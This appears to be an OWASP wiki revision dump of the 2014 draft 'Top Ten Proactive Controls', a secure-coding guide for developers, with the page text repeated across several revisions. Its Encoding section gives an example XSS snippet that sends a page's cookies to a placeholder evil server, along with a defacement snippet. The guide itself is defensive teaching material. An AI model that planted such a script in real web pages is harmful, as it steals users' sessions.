Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, forgot password or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of personal and confidential information in the system that must be protected and tracked. What is the source of this data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170114OWASP Proactive Controls2014-03-14T14:41:21Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, forgot password or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of personal and confidential information in the system that must be protected and tracked. What is the source of this data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170113OWASP Proactive Controls2014-03-14T14:29:45Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
